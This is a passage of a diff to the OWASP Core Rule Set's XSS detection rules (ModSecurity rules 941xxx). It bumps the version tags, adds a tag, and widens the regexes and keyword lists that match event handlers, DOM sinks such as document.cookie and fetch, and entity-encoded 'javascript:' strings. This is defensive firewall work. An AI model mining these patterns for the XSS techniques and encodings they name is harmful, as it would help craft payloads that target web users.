?:aling|s(?:abled|c(?:hargingtimechange|onnect(?:ed|ing))))|o(?:m(?:a(?:ctivate|ttrmodified)|(?:characterdata|subtree)modified|focus(?:in|out)|mousescroll|node(?:inserted(?:intodocument)?|removed(?:fromdocument)?))|wnloading)|r(?:ag(?:drop|e(?:n(?:d|ter)|xit)|(?:gestur|leav)e|over|start)|op)|urationchange)|e(?:mptied|n(?:abled|d(?:ed|Event)?|ter)|rror(?:update)?|xit)|f(?:ailed|i(?:lterchange|nish)|o(?:cus(?:in|out)?|rm(?:change|input))|ullscreenchange)|g(?:amepad(?:axismove|button(?:down|up)|(?:dis)?connected)|et)|h(?:ashchange|e(?:adphoneschange|l[dp])|olding)|i(?:cc(?:cardlockerror|infochange)|n(?:coming|put|valid))|key(?:down|press|up)|l(?:evelchange|o(?:ad(?:e(?:d(?:meta)?data|nd)|start)?|secapture)|y)|m(?:ark|essage|o(?:use(?:down|enter|(?:lea|mo)ve|o(?:ut|ver)|up|wheel)|ve(?:end|start)?|z(?:a(?:fterpaint|udioavailable)|(?:beforeresiz|orientationchang|t(?:apgestur|imechang))e|(?:edgeui(?:c(?:ancel|omplet)|start)e|network(?:down|up)loa)d|fullscreen(?:change|error)|m(?:agnifygesture(?:start|update)?|ouse(?:hittest|pixelscroll))|p(?:ointerlock(?:change|error)|resstapgesture)|rotategesture(?:start|update)?|s(?:crolledareachanged|wipegesture(?:end|start|update)?))))|no(?:match|update)|o(?:(?:bsolet|(?:ff|n)lin)e|pen|verflow(?:changed)?)|p(?:a(?:ge(?:hide|show)|int|(?:st|us)e)|lay(?:ing)?|o(?:inter(?:down|enter|(?:(?:lea|mo)v|rawupdat)e|o(?:ut|ver)|up)|p(?:state|up(?:hid(?:den|ing)|show(?:ing|n))))|ro(?:gress|pertychange))|r(?:atechange|e(?:adystatechange|ceived|movetrack|peat(?:Event)?|quest|s(?:et|ize|u(?:lt|m(?:e|ing)))|trieving)|ow(?:e(?:nter|xit)|s(?:delete|inserted)))|s(?:croll(?:end)?|e(?:arch|ek(?:complete|ed|ing)|lect(?:ionchange|start)?|n(?:ding|t)|t)|how|(?:ound|peech)(?:end|start)|t(?:a(?:lled|rt|t(?:echange|uschanged))|k(?:comma|sessione)nd|op)|u(?:bmit|ccess|spend)|vg(?:abort|error|(?:un)?load|resize|scroll|zoom))|t(?:ext|ime(?:out|update)|o(?:ggle|uch(?:cancel|en(?:d|ter)|(?:lea|mo)ve|start))|ransition(?:cancel|end|run|start))|u(?:n(?:derflow|handledrejection|load)|p(?:dateready|gradeneeded)|s(?:erproximity|sdreceived))|v(?:ersion|o(?:ic|lum)e)change|w(?:a(?:it|rn)ing|ebkit(?:animation(?:end|iteration|start)|(?:playbacktargetavailabilitychange|transitionen)d)|heel)|zoom)|ping|s(?:rc|tyle))[\x08-\n\f\r ]*?=" \
     "id:941160,\
     phase:2,\
     block,\
@@ -212,8 +217,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
     tag:'xss-perf-disable',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-XSS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -237,8 +243,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
     tag:'xss-perf-disable',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-XSS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -249,7 +256,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
 # https://github.com/validatorjs/validator.js/
 # This rule has a stricter sibling 941181 (PL2) that covers the additional payload "-->"
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@pm document.cookie document.domain document.write .parentnode .innerhtml window.location -moz-binding <!-- <![cdata[" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@pm document.cookie document.domain document.querySelector document.body.appendChild document.write .parentnode .innerhtml window.location -moz-binding <!-- <![cdata[" \
     "id:941180,\
     phase:2,\
     block,\
@@ -264,8 +271,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'xss-perf-disable',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-XSS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -291,8 +299,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'xss-perf-disable',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-XSS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -313,20 +322,23 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'xss-perf-disable',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-XSS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
 
+# This rule tries to match all the possible ways to write 'javascript' using
+# html entities, and javascript escape sequences.
 SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)(?:j|&#(?:0*(?:74|106)|x0*[46]A);)(?:[\t\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:a|&#(?:0*(?:65|97)|x0*[46]1);)(?:[\t\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:v|&#(?:0*(?:86|118)|x0*[57]6);)(?:[\t\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:a|&#(?:0*(?:65|97)|x0*[46]1);)(?:[\t\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:s|&#(?:0*(?:115|83)|x0*[57]3);)(?:[\t\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:c|&#(?:x0*[46]3|0*(?:99|67));)(?:[\t\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:r|&#(?:x0*[57]2|0*(?:114|82));)(?:[\t\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:i|&#(?:x0*[46]9|0*(?:105|73));)(?:[\t\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:p|&#(?:x0*[57]0|0*(?:112|80));)(?:[\t\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:t|&#(?:x0*[57]4|0*(?:116|84));)(?:[\t\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?::|&(?:#(?:0*58|x0*3A);?|colon;))." \
     "id:941210,\
     phase:2,\
     block,\
     capture,\
     t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\
-    msg:'IE XSS Filters - Attack Detected',\
+    msg:'Javascript Word Detected',\
     logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
     tag:'application-multi',\
     tag:'language-multi',\
@@ -335,8 +347,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'xss-perf-disable',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-XSS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -357,8 +370,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'xss-perf-disable',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-XSS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -379,8 +393,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'xss-perf-disable',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-XSS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -401,8 +416,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'xss-perf-disable',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-XSS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -423,8 +439,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'xss-perf-disable',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-XSS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -445,8 +462,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'xss-perf-disable',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-XSS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -467,8 +485,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'xss-perf-disable',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-XSS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -489,8 +508,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'xss-perf-disable',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-XSS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -511,8 +531,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'xss-perf-disable',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-XSS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -533,8 +554,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'xss-perf-disable',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-XSS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -593,8 +615,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'xss-perf-disable',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-XSS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     chain"
     SecRule MATCHED_VARS "@rx (?:\xbc\s*/\s*[^\xbe>]*[\xbe>])|(?:<\s*/\s*[^\xbe]*\xbe)" \
@@ -622,8 +645,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'xss-perf-disable',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-XSS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -664,8 +688,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'xss-perf-disable',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-XSS',\
     tag:'capec/1000/152/242/63',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -692,8 +717,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS|REQU
     tag:'xss-perf-disable',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-XSS',\
     tag:'capec/1000/152/242/63',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -710,7 +736,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS|REQU
 # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
 #   crs-toolchain regex update 941390
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)\b(?:eval|set(?:timeout|interval)|new[\s\x0b]+Function|a(?:lert|tob)|btoa|prompt|confirm)[\s\x0b]*\(" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)\b(?:eval|set(?:timeout|interval)|new[\s\x0b]+Function|a(?:lert|tob)|btoa|(?:promp|impor)t|con(?:firm|sole\.(?:log|dir))|fetch)[\s\x0b]*[\(\{]" \
     "id:941390,\
     phase:2,\
     block,\
@@ -724,8 +750,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'xss-perf-disable',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-XSS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -754,15 +781,16 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'xss-perf-disable',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-XSS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:941013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:941014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:941013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:941014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
 #
 # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher)
 #
@@ -785,8 +813,9 @@ SecRule REQUEST_FILENAME|REQUEST_HEADERS:Referer "@detectXSS" \
     tag:'xss-perf-disable',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-XSS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -797,14 +826,14 @@ SecRule REQUEST_FILENAME|REQUEST_HEADERS:Referer "@detectXSS" \
 # XSS vectors making use of event handlers like onerror, onload etc, e.g., <body onload="alert(1)">
 #
 # We are not listing all the known event handlers like rule 941160, but we
-# limit the alerts to keywords of 3-25 characters after the prefix ("on").
+# limit the alerts to keywords of 3-50 characters after the prefix ("on").
 #
-# The shortest known event is "onget". The longest known event is "onmozorientationchange"
-# with 23 chars after the prefix. 25 chars adds a little bit of safety.
+# The shortest known event is "onget". The longest known event is "onwebkitplaybacktargetavailabilitychanged"
+# with 39 chars after the prefix. 50 chars adds a little bit of safety.
 #
 # This rule has been moved to PL2 since it has a tendency to trigger on random input.
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)[\s\"'`;/0-9=\x0B\x09\x0C\x3B\x2C\x28\x3B]on[a-zA-Z]{3,25}[\s\x0B\x09\x0C\x3B\x2C\x28\x3B]*?=[^=]" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)[\s\"'`;/0-9=\x0B\x09\x0C\x3B\x2C\x28\x3B]on[a-zA-Z]{3,50}[\s\x0B\x09\x0C\x3B\x2C\x28\x3B]*?=[^=]" \
     "id:941120,\
     phase:2,\
     block,\
@@ -819,8 +848,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
     tag:'xss-perf-disable',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-XSS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -845,8 +875,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
     tag:'xss-perf-disable',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-XSS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -873,8 +904,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'xss-perf-disable',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-XSS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -960,9 +992,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
     tag:'xss-perf-disable',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-XSS',\
     tag:'capec/1000/152/242/63',\
     tag:'PCI/6.5.1',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -982,9 +1015,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
     tag:'xss-perf-disable',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-XSS',\
     tag:'capec/1000/152/242',\
     tag:'PCI/6.5.1',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1007,9 +1041,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
     tag:'xss-perf-disable',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-XSS',\
     tag:'capec/1000/152/242',\
     tag:'PCI/6.5.1',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1041,24 +1076,25 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'xss-perf-disable',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-XSS',\
     tag:'capec/1000/152/242/63',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:941015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:941016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:941015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:941016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
 #
 # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher)
 #
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:941017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:941018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:941017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:941018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
 #
 # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher)
